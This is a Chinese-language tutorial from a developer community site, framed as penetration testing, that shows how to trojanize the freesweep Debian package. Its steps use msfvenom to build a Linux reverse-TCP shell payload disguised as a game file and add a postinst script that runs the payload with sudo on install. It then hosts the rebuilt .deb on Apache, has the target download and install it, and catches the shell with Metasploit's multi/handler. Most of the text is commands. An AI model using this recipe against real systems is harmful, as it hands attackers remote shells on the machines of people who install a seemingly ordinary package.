AI 助理
备案控制台
开发者社区 安全 文章 正文

2022-渗透测试-制作恶意deb软件包来触发后门

2022-11-24 267
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 2022-渗透测试-制作恶意deb软件包来触发后门

目录

1.下载软件包

2.解压软件包

小知识1:kali更新或安装包的目录

小知识2:kali解压或安装操作

3.生成恶意代码到软件包源文件中

4.创建软件包信息目录

5.重新生成一个软件包

6 将deb提供下载

7 启动msfconsole

8.配置监听

10 目标机下载并安装带木马的deb软件

11.目标机安装软件

12 监控端获取到session

1.下载软件包

kali安装软件包

apt install 软件名称

image.gif

kali下载软件包

apt --download-only install 软件名称

image.gif

如图,下载软件包

apt --download-only install freesweep

image.gif

image.gif编辑

2.解压软件包

小知识1:kali更新或安装包的目录

kali系统更新或安装的包目录:/var/cache/apt/archives/

image.gif编辑

我们去查找刚刚下载的包,使用ls | grep free

image.gif编辑

将这个包移动到跟目录下,便于后面的操作 mv ./freesweep_1.0.2-1_amd64.deb ~/

image.gif编辑

image.gif编辑

小知识2:kali解压或安装操作

安装:dpkg -i

解压:dpkg -x

我们将软件包解压 

dpkg -x freesweep_1.0.2-1_amd64.deb free

image.gif

image.gif编辑

切换到free目录,查看文件列表

image.gif编辑

3.生成恶意代码到软件包源文件中

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
LHOST=192.168.0.109 LPORT=4444 -b "\x00" -i 10 -f elf -o
/root/free/usr/games/freesweep_sources

image.gif

扩展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。

4.创建软件包信息目录

创建软件包目录

mkdir free/DEBIAN

切换目录

cd free/DEBIAN

编辑

vim  /root/free/DEBIAN/control

Package:freesweep
Version:1.0.1-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers(ubuntu-motu@lists.ubuntu.com)
Description:a text-based minesweeper Freesweep is an implementation of the
popular minesweeper game,where one tries to find all the mines without igniting
any,based on hints given by the computer.Unlike most implementations of this
game,Freesweep works in any visual text display - in Linux console,in an
xterm,and in most text-based terminals currently in use.

image.gif

image.gif编辑

创建deb软件包,安装后脚本文件,来加载后门

tee /root/free/DEBIAN/postinst << 'EOF'
#!/bin/bash
sudo chmod 755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

image.gif

image.gif编辑

给postinst加执行权限

chmod 755 /root/free/DEBIAN/postinst

image.gif

image.gif编辑

5.重新生成一个软件包

dpkg-deb --build /root/free/

image.gif

6 将deb提供下载

systemctl start apache2
systemctl status apache2

image.gif

将free.deb复制到apache2 根目录

cp free.deb /var/www/html/

image.gif

7 启动msfconsole

8.配置监听

msf5 \> use exploit/multi/handler

image.gif

加载payload

msf5 exploit(multi/handler) \> set payload linux/x64/meterpreter/reverse_tcp

image.gif

设置监听主机

msf5 exploit(multi/handler) \> set lhost 192.168.31.53

image.gif

查看需要配置的参数

msf5 exploit(multi/handler) \> show options

image.gif

run

10 目标机下载并安装带木马的deb软件

wget http://192.168.0.109/free.deb

image.gif

11.目标机安装软件

dpkg -i free.deb

image.gif

12 监控端获取到session

文章标签:
监控
网络安全
安全
关键词:
测试软件包
小白渗透测试
目录
相关文章
不吃核桃
|
3月前
|
测试技术 语音技术
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
不吃核桃
59 0
1387503158665997
|
2月前
|
Android开发
Android学习 —— 测试init.rc中的条件触发的处理顺序
Android学习 —— 测试init.rc中的条件触发的处理顺序
1387503158665997
28 4
不吃核桃
|
3月前
|
Docker 容器
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
不吃核桃
32 0
众所周知
|
4月前
|
Java jenkins 持续交付
Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试
【7月更文挑战第1天】Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试。成功后,Jenkins执行部署任务,发布到服务器或云环境。使用Jenkins能提升效率,保证软件质量,加速上线,并需维护其稳定运行。
众所周知
121 0
红目香薰
|
5月前
|
SQL 存储 关系型数据库
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
红目香薰
32 0
肥猪肥猪-17824
|
6月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
肥猪肥猪-17824
92 0
开发者小达人
|
测试技术
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
做一个测试:
开发者小达人
124 0
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
技术工程师
|
测试技术
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
技术工程师
113 0
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
码农小达人
|
测试技术
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
码农小达人
170 0
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
玄学酱
|
Ubuntu 测试技术 Linux
使用Snapcraft构建、测试并发布Snap软件包
玄学酱
3093 0

热门文章

最新文章

  • 1
    深度 | 大数据算法应用的测试发展之路
  • 2
    测试开启MySQL performance_schema后对性能的影响
  • 3
    在MS单元测试中引发期望异常
  • 4
    Cacti 远程SHELL测试失败!
  • 5
    测试用例概念 原则
  • 6
    5G加速商业化 移动边缘计算测试年内完成
  • 7
    爱立信携法国布依格电信5G测试 实现25.2Gbps速率
  • 8
    TestNG官方文档中文版(5)-测试方法/类和组
  • 9
    postgresql 9.6 建立多列索引测试
  • 10
    VSTS 通过生成中未通过的测试自动创建 Bug 工作项
  • 1
    《手把手教你》系列技巧篇(九)-java+ selenium自动化测试-元素定位大法之By name(详细教程)
    114
  • 2
    提升龙蜥内核测试能力!探究持续性模糊测试优化实践
    98
  • 3
    软件测试中的自动化工具与策略
    45
  • 4
    如何进行移动应用的测试?
    71
  • 5
    深入理解与应用软件自动化测试工具Selenium
    55
  • 6
    测试环境的数据库连不了,打包报错怎么办
    37
  • 7
    深入探究App压力测试的关键要点:从零开始学习Monkey
    98
  • 8
    【软件设计师备考 专题 】测试要求说明书的编写和应用
    107
  • 9
    【软件设计师备考 专题 】系统实施:程序设计和系统测试
    103
  • 10
    【软件设计师备考 专题 】可靠性测试和可靠性评估
    155

    • 相关课程

    更多
  • MSE微服务测试最佳实践 - 自动化回归
  • 网络安全攻防 - Web渗透测试

    • 相关电子书

    更多
  • 移动互联网测试到质量的转变
  • 给ITer的技术实战进阶课-阿里CIO学院独家教材(四)
  • F2etest — 多浏览器兼容性测试整体解决方案

    • 相关实验场景

    更多
  • 1分钟代码漏洞自动检测
  • 快速上手并跑通AnalyticDB PostgreSQL版TPC-H测试
  • 灵活弹性的PolarDB Serverless确保数据业务持续在线
    • 下一篇
    阿里云无影云电脑免费试用,最长可试用3个月